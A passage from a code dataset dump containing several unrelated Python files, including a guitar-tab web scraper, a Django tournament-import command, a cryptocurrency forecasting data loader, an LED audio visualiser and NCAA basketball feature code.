name='editar'),\n path('feed/', views.feed, name='feed'),\n path('crear/', LoginView.as_view(template_name='principal/crear.html'), name=\"crear\"),\n path('login/', LoginView.as_view(template_name='principal/login.html'), name='login'),\n path('logout/', LogoutView.as_view(template_name='principal/logout.html'), name='logout'),\n]","sub_path":"principal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"450607573","text":"\"\"\"\nThis module contains all the methods you need for scraping either a single tab file or a predefined set of tab files\nfrom the Internet.\n\"\"\"\n\nfrom selenium import webdriver\nfrom os import path\nfrom googlesearch import search\n\n\ndef download_tab(tab_url: str, tab_directory: str, tab_name: str) -> (bool, str):\n \"\"\"\n Download a tab file from the Internet, using the tab_url and place it in the tab_directory, called tab_name.\n Return a message indicating success or failure.\n\n :param tab_url: Location of the tab file on the Internet\n :param tab_directory: Local directory where the tab file should be placed on your machine\n :param tab_name: File name of your tab file\n :return: Boolean and str message, indicating success or failure\n \"\"\"\n\n target_path = path.join(tab_directory, tab_name)\n if path.isfile(target_path):\n return False, None\n\n try:\n browser = webdriver.Firefox()\n browser.get(tab_url)\n # tab_text = browser.find_element_by_xpath(\"//pre[@class='_3F2CP _1rDYL']\").text\n tab_text = browser.find_element_by_xpath(\"//code[@class='_3enQP']\").text\n # _3F2CP _1rDYL _3F2CP _1rDYL _3F2CP _3hukP\n browser.close()\n\n with open(target_path, 'w') as f:\n f.write(tab_text)\n except Exception:\n browser.quit()\n return False, 'Error downloading ' + tab_name + ' on ' + tab_url\n return True, 'Download succeeded'\n\n\ndef download_data_set_from_csv(csv_path: str, tab_directory: str):\n \"\"\"\n Download a data set of tab files, as specified by the csv file in csv_path, and put them into tab_directory.\n If a tab file cannot be downloaded successfully, for example because the file already existed or because the\n Internet connection broke down, then the function continues with downloading the other tab files. After trying to\n download all prescribed tab files, this function returns a message indicating the number of tab files that were\n downloaded successfully and the number of tab files for which the download failed.\n\n :param csv_path: Path to the csv file with lines in format [url];[name];[key];[filename] (for example IndexTabs.csv)\n :param tab_directory: Local location for the downloaded files\n \"\"\"\n nr_successful = 0\n nr_unsuccessful = 0\n\n # Open the csv file\n with open(csv_path, 'r') as read_file:\n csv_content = read_file.readlines()\n for line in csv_content:\n parts = line.rstrip().split(';')\n tab_url = parts[0]\n tab_name = parts[3]\n success, message = download_tab(tab_url, tab_directory, tab_name)\n if success:\n nr_successful += 1\n else:\n nr_unsuccessful += 1\n if message:\n print(message)\n\n print(str(nr_successful) + ' tab files were downloaded successfully. ' + str(nr_unsuccessful) + ' failed.')\n\n\ndef search_tabs(song_title='', artist_name='', limit=6, absolute_write_path=''):\n all_urls = []\n for url in search(f'{song_title}-{artist_name} ultimate-guitar chords', stop=int(limit/2)):\n all_urls.append(url)\n for url in search(f'{song_title} ultimate-guitar chords', stop=int(limit/2)):\n all_urls.append(url)\n return all_urls\n\n\ndef download_tabs_from_url_list(url_list, absolute_write_path, song_title, artist_name):\n i = 0\n for url in url_list:\n download_tab(url, absolute_write_path, f\"{song_title}-{artist_name}_{i}\")\n i += 1\n","sub_path":"decibel/file_scraper/tab_scraper.py","file_name":"tab_scraper.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"378396367","text":"import math\n\n\nrebro = 4\nradius = 0.001\nvolume = rebro ** 3\nn = 0.000001\nARRAY=[]\n\n\ndef toFixed(numObj,digits=3):\n return f\"{numObj:.{digits}f}\"\ndef max_coefficient(radius=radius,n=n,ARRAY=ARRAY):\n while radius > 0:\n\n x = rebro / (2 * radius)\n z = int(((math.sqrt(6)) / 2) * (x - 1) + 1)\n y = int((2 * (x - 1) * math.sqrt(3) / 3) + 1)\n xy = (2 * x - 1) * y\n\n N = xy * (int(z / 2) + z % 2)\n amount = (4 * math.pi * radius ** 3) * N / 3\n coefficient = (amount / volume)*100\n\n rad = float(toFixed(radius))\n coefficient=float(toFixed(coefficient))\n asdf = [coefficient,rad]\n ARRAY.append(asdf)\n radius = radius - n\n\n\n return ARRAY\n\n\nSTAS=max_coefficient()\n\n\nfile=open('coefficients.txt', 'w')\nfor i in STAS:\n file.write('{} {}\\n'.format(i[0],i[1]))\n\n\n\nprint(\"Максимальный коэффициент наполнения - {}%\".format(coefficient))\n\n\n","sub_path":"kursach/max_coefficient.py","file_name":"max_coefficient.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"637448661","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSample report generation script from pbpython.com\n\nThis program takes an input Excel file, reads it and turns it into a\npivot table.\n\nThe output is saved in multiple tabs in a new Excel file.\n\"\"\"\n\nimport argparse\nimport pandas as pd\nimport numpy as np\n\n\ndef create_pivot(infile, index_list=[\"Manager\", \"Rep\", \"Product\"],\n value_list=[\"Price\", \"Quantity\"]):\n \"\"\"\n Read in the Excel file, create a pivot table and return it as a DataFrame\n \"\"\"\n df = pd.read_excel(infile)\n table = pd.pivot_table(df, index=index_list,\n values=value_list,\n aggfunc=[np.sum, np.mean], fill_value=0)\n return table\n\n\ndef save_report(report, outfile):\n \"\"\"\n Take a report and save it to a single Excel file\n \"\"\"\n writer = pd.ExcelWriter(outfile)\n for manager in report.index.get_level_values(0).unique():\n temp_df = report.xs(manager, level=0)\n temp_df.to_excel(writer, manager)\n writer.save()\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Script to generate sales report')\n parser.add_argument('infile', type=argparse.FileType('r'),\n help=\"report source file in Excel\")\n parser.add_argument('outfile', type=argparse.FileType('w'),\n help=\"output file in Excel\")\n args = parser.parse_args()\n # We need to pass the full file name instead of the file object\n sales_report = create_pivot(args.infile.name)\n save_report(sales_report, args.outfile.name)\n\n","sub_path":"all-gists/ba3f37dd7c52077d4eeb/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"439730642","text":"\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.template.defaultfilters import slugify\nfrom optparse import make_option\nimport argparse\nfrom taekwondo.models import *\nimport csv, os\nfrom datetime import datetime \nfrom unidecode import unidecode\nfrom django.db.models import Q\nfrom django.core.exceptions import ObjectDoesNotExist\nimport collections\n\nclass Command(BaseCommand):\n\n help = 'Sæki bardaga frá mótum úr CSV skrá frá TKÍ'\n #club_list = list(Club.objects.all())\n option_list = BaseCommand.option_list + (\n make_option(\n \"-f\", \n \"--file\", \n dest = \"filename\",\n help = \"specify import file\", \n metavar = \"FILE\"\n ),\n\n ) \n\n def get_fight_info(self, item):\n \n self.fight_info = (\n ('tournament_name', item[0]),\n ('fight_number', item[1]),\n ('age_division', item[2]),\n ('belt_group', item[3]),\n ('weight_group', item[4]),\n ('gender', item[5]),\n ('red_club', item[6]),\n ('blue_club', item[7]),\n ('red_player', item[8]),\n ('blue_player', item[9]),\n ('red_points', item[10]),\n ('blue_points', item[11]),\n )\n self.fight_info = collections.OrderedDict(self.fight_info)\n return self.fight_info\n\n def update_csv(self, updated_fight_info):\n updated_csv = self.original_csv.strip('.csv')+'-updated.csv'\n print(list(updated_fight_info.values()))\n with open(updated_csv, 'a', newline='') as f:\n writer = csv.writer(f, delimiter=';')\n writer.writerow(list(updated_fight_info.values()))\n\n def compare_members(self, _member, _club):\n selection = {}\n print('Reyni að prenta %s' % _member)\n try:\n member_list = list(Member.objects.filter(name__istartswith=_member.split()[0]))\n print('')\n print('\"%s\" í félaginu \"%s\" fannst ekki í FELIX. Var hann skráður með öðru nafni á mótið?' % (_member, _club))\n print('')\n\n if len(member_list) >= 1:\n print('### Listi með öllum iðkendum úr FELIX með sama fornafn ###')\n #print(member_list)\n else:\n print('### Enginn iðkandi með nafnið \"%s\" fannst í FELIX ###' % _member)\n \n selection[0] = ['Bæta við \"%s\" sem nýjum iðkanda' % _member]\n print('%s. %s' % (0, selection.get(0)))\n \n for i, member in enumerate(member_list):\n i = i+1\n selection[i] = [member, member.active_club]\n print('%s. %s - %s' % (i, member.name, member.active_club))\n \n \n while True:\n try:\n user_input = int(input('Veldu númer: '))\n except ValueError:\n print('Þetta er ekki tölustafur!')\n else:\n if 0 <= user_input <= len(member_list):\n break\n else:\n print('Kommon, tölu úr listanum maður!')\n\n\n \n if user_input == 0:\n m = Member(name=_member, slug=slugify(unidecode(_member)))\n m.save()\n ms = Membership(member=m, club=_club, date_joined=datetime.now())\n ms.save()\n\n return m\n\n else:\n print('Tengi \"%s\" við \"%s\"' % (_member, selection.get(user_input)[0]))\n return selection.get(user_input)[0] \n\n except IndexError:\n print('Tókst ekki að leita eftir \"%s\"' % _member.split()[0])\n \n def validate_member(self, _member, _club):\n try:\n m = Member.objects.get(name=_member)\n print('\"%s\" fannst í FELIX, tengi við færslu.' % _member)\n return m\n\n except ObjectDoesNotExist:\n print('\"%s\" fannst ekki, kíkjum aðeins betur á þetta' % _member)\n return self.compare_members(_member, _club)\n\n except MultipleObjectsReturned:\n print('\"%s\" fannst oftar en einusinni' % _member)\n \n\n #rint('%s var búinn til!' % blue_player)\n \n \n\n \n\n #user_selection = selection.get(int(user_input))\n \n \n\n #print(user_selection)\n \n '''\n for i, member in enumerate(member_list):\n if i==int(user_input):\n return member\n #user_input = input('Uhh, \"%s\" already exists, continue?' % member)\n '''\n\n def get_winner(self, red, blue, red_points, blue_points):\n if (int(blue_points) > int(red_points)):\n return blue\n return red\n\n def fight_import(self, item):\n #print(self.club_list)\n tournament_list = list(Tournament.objects.all())\n tournament_exists = False\n\n fight_info = self.get_fight_info(item)\n\n for listed_tournament in tournament_list:\n if listed_tournament.title in fight_info.get('tournament_name'):\n tournament_exists = True\n tournament_obj = listed_tournament\n \n \n\n if tournament_exists:\n print('Mót með heitinu \"%s\" er nú þegar til, bæti við bardaga ... ' % (fight_info.get('tournament_name')))\n\n tournament_age_division, created = TournamentCategoryItem.objects.get_or_create(\n category_type=1,\n title=fight_info.get('age_division')\n )\n\n tournament_weight_group, created = TournamentCategoryItem.objects.get_or_create(\n category_type=2,\n title=fight_info.get('weight_group')\n )\n\n tournament_belt_group, created = TournamentCategoryItem.objects.get_or_create(\n category_type=3,\n title=fight_info.get('belt_group')\n )\n\n division, created = TournamentDivision.objects.get_or_create(\n title='%s - %s - %s' % (\n tournament_age_division.title,\n tournament_weight_group.title,\n tournament_belt_group.title,\n ),\n tournament=tournament_obj,\n age = tournament_age_division,\n weight = tournament_weight_group,\n grade = tournament_belt_group,\n gender = 1\n )\n\n #if not (fight_info.get('red_club')=='' or fight_info.get('red_club')==''):\n \n blue_club, created = Club.objects.get_or_create(\n slug=slugify(unidecode(fight_info.get('blue_club'))),\n defaults= {\n 'name': fight_info.get('blue_club'),\n 'short_name': fight_info.get('blue_club'),\n }\n )\n \n \n red_club, created = Club.objects.get_or_create(\n slug=slugify(unidecode(fight_info.get('red_club'))),\n defaults= {\n 'name': fight_info.get('red_club'),\n 'short_name': fight_info.get('red_club'),\n }\n\n )\n\n\n blue_player = self.validate_member(fight_info.get('blue_player').strip(), blue_club)\n \n #Checking if members exist before adding them to DB\n #member_qs = (Q(Member.objects.filter(name=fight_info.get('blue_player'))) | Q(Member.objects.filter(name=fight_info.get('red_player'))))):\n '''\n blue_player, created = Member.objects.get_or_create(\n name=fight_info.get('blue_player'),\n slug=slugify(unidecode(fight_info.get('blue_player'))),\n )\n '''\n\n #blue_membership = Membership(club=blue_club, member=blue_player)\n \n \n red_player = self.validate_member(fight_info.get('red_player').strip(), red_club)\n \n '''\n red_player, created = Member.objects.get_or_create(\n name=fight_info.get('red_player'),\n slug=slugify(unidecode(fight_info.get('red_player'))),\n )\n '''\n blue_registration, created = TournamentRegistration.objects.get_or_create(\n member=blue_player,\n tournament=tournament_obj,\n #club=blue_club,\n #registration_date=datetime.now()\n ) \n \n red_registration, created = TournamentRegistration.objects.get_or_create(\n member=red_player,\n tournament=tournament_obj,\n #club=red_club,\n #registration_date=datetime.now()\n ) \n\n\n \n fight, created = Fight.objects.get_or_create(\n division = division,\n fight_number=fight_info.get('fight_number'),\n blue_player=blue_registration,\n red_player=red_registration,\n blue_points=fight_info.get('blue_points'),\n red_points=fight_info.get('red_points'),\n winner=self.get_winner(\n red_registration, \n blue_registration, \n fight_info.get('red_points'),\n fight_info.get('blue_points'),\n )\n )\n fight_info['blue_player'] = blue_player.name\n fight_info['red_player'] = red_player.name\n self.update_csv(fight_info)\n\n elif not tournament_exists:\n print('Mót með heitinu \"%s\" er ekki til, bæti því við núna.... ' % fight_info.get('tournament_name'))\n new_tournament = Tournament(\n title=fight_info.get('tournament_name'), \n date=datetime.now(), \n slug=slugify(unidecode(fight_info.get('tournament_name')))\n )\n new_tournament.save()\n \n \n \n #self.create_membership(m, c)\n \n #def felix2_import(self):\n def get_club(self, club):\n if not 'ÍSÍ' in club:\n print('Fann ekki félag í línunni: ' + club)\n return club.split('/')[-3]\n\n def handle(self, *args, **options):\n\n if options['filename'] == None :\n raise CommandError(\"Option `--file=...` must be specified.\")\n\n # make sure file path resolves\n if not os.path.isfile(options['filename']) :\n raise CommandError(\"File does not exist at the specified path.\")\n\n self.original_csv = options['filename']\n with open(options['filename'], newline='') as f:\n csv_fights = csv.reader(f, delimiter=';')\n #csv_fights = csv.reader(open(options['filename'], newline=''), delimiter=';')\n for i, row in enumerate(csv_fights):\n print(row)\n if not '' in row:\n self.fight_import(row)\n else:\n print('Gat ekki búið til bardaga, upplýsingar vantar í færsluna')\n print(row)\n","sub_path":"tki/taekwondo/management/commands/import_tournaments.py","file_name":"import_tournaments.py","file_ext":"py","file_size_in_byte":11394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"40131722","text":"import time\nimport random\nimport bibliopixel\nfrom bibliopixel.drivers.serial_driver import *\nfrom bibliopixel.led import *\nimport pyaudio\nimport wave\nimport numpy as np\nfrom struct import unpack\nfrom math import *\n\nbibliopixel.log.setLogLevel(bibliopixel.log.DEBUG)\ndriver1 = DriverSerial(num = 600, type = LEDTYPE.WS2811, deviceID = 1)\ndriver2 = DriverSerial(num = 650, type = LEDTYPE.WS2811, deviceID = 2)\nled1 = LEDMatrix(driver1, width=50, height=12, coordMap = None, rotation=MatrixRotation.ROTATE_180, masterBrightness=100, pixelSize=(1,1))\nled2 = LEDMatrix(driver2, width=50, height=13, coordMap = None, rotation=MatrixRotation.ROTATE_180, masterBrightness=100, pixelSize=(1,1))\nchunk = 4096\n\ns = pyaudio.PyAudio()\n\nsound = s.open(format = pyaudio.paInt16, channels = 2, rate = 44100, input = True, frames_per_buffer = chunk, input_device_index=2)\n\ndata = sound.read(chunk)\nwhile True:\n data = sound.read(chunk)\n data = unpack(\"%dh\"%(len(data)/2),data)\n data = np.array(data,dtype='h')\n data = abs(np.fft.rfft(data))\n data = data/100000\n y = 0\n for z in range(0,50):\n gSum=0\n for y in range(y,y+4):\n gSum+=data[y]\n dData=gSum/4\n try:\n t = int(log(dData, 1.35) * log10(z+10))\n except ValueError:\n t = 0\n\n if t>24:\n led1.fillRect(z,0,1,t,color=(255,0,0))\n led2.fillRect(z,0,1,t-12,color=(255,0,0))\n elif t>22:\n led1.fillRect(z,0,1,t,color=(255,255,0))\n led2.fillRect(z,0,1,t-12,color=(255,255,0))\n elif t>16:\n led1.fillRect(z,0,1,t,color=(0,255,0))\n led2.fillRect(z,0,1,t-12,color=(0,255,0))\n elif t>12:\n led1.fillRect(z,0,1,t,color=(0,0,255))\n led2.fillRect(z,0,1,t-12,color=(0,0,255))\n else:\n led1.fillRect(z,0,1,t,color=(0,0,255))\n led2.fillRect(z,0,1,t-12,color=(0,0,0))\n\n led2.update()\n led2.all_off()\n led1.update()\n led1.all_off()\n\nsound.stop_stream()\n\nsound.close()\ns.terminate()\n","sub_path":"CODE/presets/preset.py","file_name":"preset.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"432832548","text":"\n# Problem: https://www.acmicpc.net/problem/1181\n\nfrom sys import stdin\n\nl = []\nfor _ in range(int(input())):\n s = stdin.readline().rstrip()\n l.append((len(s),s))\n\nprint('\\n'.join([word[1] for word in sorted(set(l))]))\n","sub_path":"python/1181.py","file_name":"1181.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"426722829","text":"import requests\n\nfrom settings import pingproxy_url, results\n\nwhile True:\n try:\n r = requests.get(pingproxy_url)\n r.raise_for_status()\n except Exception as e:\n print(e)\n results[\"loses\"] += 1\n else:\n results[\"wins\"] += 1\n print(results)\n","sub_path":"pingclient.py","file_name":"pingclient.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"519849101","text":"import numpy as np\n\n# Function to bin the spikes of cluster cluster_nbr with bin size time_window\ndef binning(spt_mat,trig,time_window,cluster_nbr,dmr=1,ftsize=22):\n fs=24414.0625\n #DMR delimitation (depending on trigger)\n first_t=np.amin(trig)/fs\n last_t=np.amax(trig)/fs\n\n #Preparing binning,rast_arr has the same duration as the dmr\n N_bins=int((last_t-first_t)/time_window)+1\n rast_arr=np.zeros(N_bins)\n\n #Getting cluster numbers\n N_clu=spt_mat.shape[0]\n list_clu=np.zeros(N_clu)\n\n for clu_ind in range(N_clu):\n list_clu[clu_ind]=spt_mat[clu_ind][0][0][0]\n\n # Figuring last spikes for cluster of interest\n ind_neuron=np.where(list_clu==cluster_nbr)[0][0]\n\n ind_last_spike=np.where(spt_mat[ind_neuron][1]/fs<=last_t)[0][-1]\n ind_first_spike=np.where(spt_mat[ind_neuron][1]/fs>=first_t)[0][0]\n\n #binning\n for t in np.arange(ind_first_spike,ind_last_spike+1):\n ind_bin=int((spt_mat[ind_neuron][1][t][0]/fs-first_t)/time_window)\n rast_arr[ind_bin]+=1\n\n return rast_arr[:-1]\n","sub_path":"binning.py","file_name":"binning.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"489331118","text":"import os\nfrom functools import reduce\n\nimport pandas as pd\nimport numpy as np\n\nfrom . import settings\n\n\ndef get_data(cryptocurrency, fillna=0):\n crypto_path = os.path.join(settings.RESOURCES_DIR, cryptocurrency)\n\n # Currency related data frames\n price_df = _read_csv(os.path.join(crypto_path, 'price.csv'))\n _lower_headers(price_df)\n # price_df = _floaterize_prices(price_df)\n price_df['date'] = pd.to_datetime(price_df['date'])\n\n transactions_df = _read_csv(os.path.join(crypto_path, 'transactions.csv'))\n _lower_headers(transactions_df)\n transactions_df['date'] = pd.to_datetime(transactions_df['date'])\n\n # Forum related data frames\n reply_df = _read_csv(os.path.join(crypto_path, 'reply_opinion.csv'))\n _lower_headers(reply_df)\n\n topic_df = _read_csv(os.path.join(crypto_path, 'topic_opinion.csv'))\n _lower_headers(topic_df)\n\n # Categorize vader scores\n reply_df = _transform_vader_series(reply_df, 'reply')\n topic_df = _transform_vader_series(topic_df, 'topic')\n\n # Drop useless columns\n _drop_inplace(reply_df, ['reply', 'vader'])\n _drop_inplace(topic_df, ['topic', 'reply', 'topiccontent', 'vader', 'opinion'])\n\n # Group by date and aggregate vader categorical columns\n reply_df = _fold_categorical_vader(reply_df, 'reply', by='date')\n topic_df = _fold_categorical_vader(topic_df, 'topic', by='date', agg={'views':'sum'})\n\n # Calculate daily sentiment\n reply_df = _sum_categorical_vader(reply_df, 'reply')\n topic_df = _sum_categorical_vader(topic_df, 'topic') \n\n # Set date as index for forum related dfs\n reply_df['date'] = pd.to_datetime(reply_df['date'])\n reply_df.index = pd.DatetimeIndex(reply_df['date'])\n reply_df = reply_df.drop(columns='date')\n\n topic_df['date'] = pd.to_datetime(topic_df['date'])\n topic_df.index = pd.DatetimeIndex(topic_df['date'])\n topic_df = topic_df.drop(columns='date')\n\n # Set 1 calendar day frequency, where missing data i completed with 0\n reply_df = reply_df.asfreq(freq='1D').fillna(fillna)\n topic_df = topic_df.asfreq(freq='1D').fillna(fillna)\n\n # Merge data frames\n dfs = [reply_df, topic_df]\n forum_related = _merge_frames(dfs, on='date')\n # forum_related['date'] = pd.to_datetime(forum_related['date'])\n\n # Merge data frames\n dfs = [price_df, transactions_df, forum_related]\n full_df = _merge_frames(dfs, on='date')\n\n # Sort by date\n full_df = full_df.sort_values(by='date')\n\n # Set today's label_headers' values as tomorrow's features\n for label in ['price', 'transactions']:\n full_df['today_' + label] = full_df[label].copy()\n\n # Binerize labels (price and transactions)\n full_df = _categorize_labels(full_df)\n\n # Set dates to index\n full_df.index = pd.DatetimeIndex(full_df['date'])\n full_df = full_df.drop(columns='date')\n\n return full_df\n\ndef _read_csv(file_path):\n try:\n df = pd.read_csv(file_path)\n except UnicodeDecodeError:\n df = pd.read_csv(file_path, encoding='latin1')\n \n return df\n\ndef _lower_headers(df):\n df.columns = map(str.lower, df.columns)\n\ndef _floaterize_prices(price_df):\n remove_comma = lambda text: text.replace(',', '')\n\n # price_df['open'] = price_df['open'].apply(remove_comma).astype(float)\n # price_df['close'] = price_df['close'].apply(remove_comma).astype(float)\n # price_df['high'] = price_df['high'].apply(remove_comma).astype(float)\n # price_df['low'] = price_df['low'].apply(remove_comma).astype(float)\n \n price_df['price'] = price_df['price'].apply(remove_comma).astype(float)\n\n return price_df\n\ndef _categorize_labels(df):\n labels = ['price', 'transactions']\n\n df[labels] = df[labels].diff().apply(np.sign)\n df[labels] = df[labels].replace(0, -1).astype(str).shift(-1)\n\n df = df.dropna()\n\n return df\n\ndef _transform_vader_series(df, header_suffix):\n \"\"\"\n Transform vader series of dataframe to categorical vader series.\n \"\"\"\n\n categorical_vader = list(zip(*df['vader'].map(_categorize_vader)))\n\n categorical_columns = _get_categorical_vader(header_suffix)\n\n for index, header in enumerate(categorical_columns):\n df[header] = categorical_vader[index]\n\n return df\n\ndef _categorize_vader(score):\n \"\"\"\n Transform vader score into one of the following categorical values:\n - Very negative\n - Negative\n - Neutral\n - Positive\n - Very positive\n\n Returns a tuple with 5 positions (one for each category)\n where one element contains 1 and the others are 0.\n \"\"\"\n if score < -0.6:\n # Very negative\n return (1, 0, 0, 0, 0)\n elif score < -0.2:\n # Negative\n return (0, 1, 0, 0, 0)\n elif score < 0.2:\n # Neutral\n return (0, 0, 1, 0, 0)\n elif score < 0.6:\n # Positive\n return (0, 0, 0, 1, 0)\n else:\n # Very positive\n return (0, 0, 0, 0, 1)\n\ndef _drop_inplace(df, columns):\n df.drop(columns, inplace=True, axis=1)\n\ndef _fold_categorical_vader(df, header_suffix, by=None, agg={}):\n agg_type = {}\n categorical_columns = _get_categorical_vader(header_suffix)\n \n for header in categorical_columns:\n agg_type[header] = 'sum'\n\n for column, type_ in agg.items():\n agg_type[column] = type_\n\n return df.groupby(by).agg(agg_type).reset_index()\n\ndef _sum_categorical_vader(df, header_suffix):\n categorical_columns = _get_categorical_vader(header_suffix)\n df['total_' + header_suffix] = df[categorical_columns].sum(axis=1)\n return df\n\ndef _get_categorical_vader(header_suffix):\n very_negative = 'very_negative_' + header_suffix\n negative = 'negative_' + header_suffix\n neutral = 'neutral_' + header_suffix\n positive = 'positive_' + header_suffix\n very_positive = 'very_positive_' + header_suffix\n\n return [very_negative, negative, neutral, positive, very_positive]\n\ndef _merge_frames(dfs, on=None):\n return reduce(lambda left,right: pd.merge(left,right,on=on), dfs)","sub_path":"forecaster/retriever.py","file_name":"retriever.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"132555033","text":"#!/usr/bin/python3\n\"\"\"A script that lists all states from the database hbtn_0e_0_usa\"\"\"\n\n# connect to database\n# db = MySQLdb.connect(host=MY_HOST, user=MY_USER, passwd=MY_PASS, db=MY_DB)\nif __name__ == \"__main__\":\n import MySQLdb\n from sys import argv\n db = MySQLdb.connect(host=\"localhost\",\n port=3306, user=argv[1], passwd=argv[2],\n db=argv[3], charset=\"utf8\")\n # set cursor\n cur = db.cursor()\n # execute query - requres SQL\n cur.execute(\"SELECT cities.name\\\n FROM cities INNER JOIN states\\\n ON cities.state_id = states.id\\\n WHERE states.name LIKE %s\\\n ORDER BY cities.name ASC\", (argv[4],))\n # format statement now enclosed in () with comma?\n # request all or all remaining rows of results as tuples\n query_rows = cur.fetchall()\n list_length = len(query_rows)\n for x in range(list_length):\n if x < list_length - 1:\n print(query_rows[x][0], end=\", \")\n else:\n print(query_rows[x][0])\n # release cursor\n cur.close()\n # disconnect from database\n db.close()\n","sub_path":"0x0F-python-object_relational_mapping/5-filter_cities.py","file_name":"5-filter_cities.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"9900767","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport math\nimport re\nimport pickle\nimport random\n\nfrom collections import defaultdict\nfrom matplotlib import pyplot as plt\nfrom sklearn import preprocessing\n\ndef init_feature_vector():\n\tdir = \"../data/\"\n\tdetailed_results = str(dir)+\"RegularSeasonDetailedResults.csv\"\n\n\tdata = {}\n\tlocation = {\"H\": 1, \"N\": 0, \"A\": -1}\n\twith open(detailed_results) as fi:\n\t\theader = fi.readline().rstrip('\\r\\n').split(',')\n\n\t\t#c = 0\n\t\tfor lines in fi:\n\t\t\t'''c += 1\n\t\t\tif (c == 4616): # 4616 for 2003 data\n\t\t\t\tbreak'''\n\n\t\t\t# Parse the line\n\t\t\tl = lines.rstrip('\\r\\n').split(',')\n\t\t\t#print(len(lineinfo))\n\n\t\t\tseason = l[0]\n\t\t\tday_num = l[1]\n\t\t\tw_team = l[2]\n\t\t\tw_score = int(l[3])\n\t\t\tl_team = l[4]\n\t\t\tl_score = int(l[5])\n\t\t\tw_loc = l[6]\n\t\t\t#numot = l[7]\n\n\t\t\t# Init for new keys\n\t\t\tif season not in data:\n\t\t\t\tdata[season] = {}\n\t\t\tif w_team not in data[season]:\n\t\t\t\tdata[season][w_team] = {\"total_score\": 0, \"loc_sum\": 0, \"num_games\": 0, \"game_results\": [], \"end_streak\": 0, \"max_streak\": 0, \"total_def_reb\": 0, \"total_off_reb\": 0, \"total_num_plays\": 0}\n\t\t\tif l_team not in data[season]:\n\t\t\t\tdata[season][l_team] = {\"total_score\": 0, \"loc_sum\": 0, \"num_games\": 0, \"game_results\": [], \"end_streak\": 0, \"max_streak\": 0, \"total_def_reb\": 0, \"total_off_reb\": 0, \"total_num_plays\": 0}\n\n\t\t\t# Standard metrics for winning team\n\t\t\tdata[season][w_team][\"total_score\"] += w_score\n\t\t\tdata[season][w_team][\"loc_sum\"] += location[w_loc]\n\t\t\tdata[season][w_team][\"num_games\"] += 1\n\t\t\tdata[season][w_team][\"game_results\"].append(1)\n\t\t\tdata[season][w_team][\"end_streak\"] += 1\n\t\t\tdata[season][w_team][\"max_streak\"] = max(data[season][w_team][\"max_streak\"], data[season][w_team][\"end_streak\"])\n\n\t\t\t# Standard metrics for losing team\n\t\t\tdata[season][l_team][\"total_score\"] += l_score\n\t\t\tdata[season][l_team][\"loc_sum\"] += -location[w_loc]\n\t\t\tdata[season][l_team][\"num_games\"] += 1\n\t\t\tdata[season][l_team][\"game_results\"].append(-1)\n\t\t\tdata[season][l_team][\"end_streak\"] = 0\n\n\t\t\tnum_features = 13\n\t\t\tfor i in range(8, 21):\n\t\t\t\tif header[i] not in data[season][w_team]:\n\t\t\t\t\tdata[season][w_team][header[i]] = 0\n\t\t\t\tif header[i] not in data[season][l_team]:\n\t\t\t\t\tdata[season][l_team][header[i]] = 0\n\n\t\t\t\tdata[season][w_team][header[i]] += int(l[i])\n\t\t\t\tdata[season][l_team][header[i]] += int(l[i+num_features])\n\n\t\t\t# Winning team additional metrics\n\t\t\tdata[season][w_team][\"total_def_reb\"] += float(data[season][w_team][\"dr\"]) / (data[season][w_team][\"dr\"] + data[season][l_team][\"or\"])\n\t\t\tdata[season][w_team][\"total_off_reb\"] += float(data[season][w_team][\"or\"]) / (data[season][w_team][\"or\"] + data[season][l_team][\"dr\"])\n\t\t\t#data[season][w_team][\"total_num_plays\"] = data[season][w_team][\"blk\"] + data[season][w_team][\"stl\"] + data[season][w_team][\"or\"] + data[season][w_team][\"dr\"]\n\n\t\t\t# Losing team additional metrics\n\t\t\tdata[season][l_team][\"total_def_reb\"] += float(data[season][l_team][\"dr\"]) / (data[season][l_team][\"dr\"] + data[season][w_team][\"or\"])\n\t\t\tdata[season][l_team][\"total_off_reb\"] += float(data[season][l_team][\"or\"]) / (data[season][l_team][\"or\"] + data[season][w_team][\"dr\"])\n\t\t\t#data[season][w_team][\"total_num_plays\"] = data[season][w_team][\"blk\"] + data[season][w_team][\"stl\"] + data[season][w_team][\"or\"] + data[season][w_team][\"dr\"]\n\n\t\t\t#print(\"Season = %s\\t| W_team = %s\\t| L_team = %s\" % (lineinfo[0], lineinfo[2],lineinfo[4]))\n\n\treturn data, header\n\ndef add_vector_averages(data, header):\n\tfor season in data:\n\t\tfor team in data[season]:\n\t\t\tnum_games = data[season][team][\"num_games\"]\n\n\t\t\tfor feat in header[8:21]:\n\t\t\t\tnew_feature = \"avg_\"+feat\n\t\t\t\ttotal_val = data[season][team][feat]\n\n\t\t\t\tdata[season][team][new_feature] = float(total_val)/num_games\n\n\t\t\t# Average Scores\n\t\t\ttotal_score = 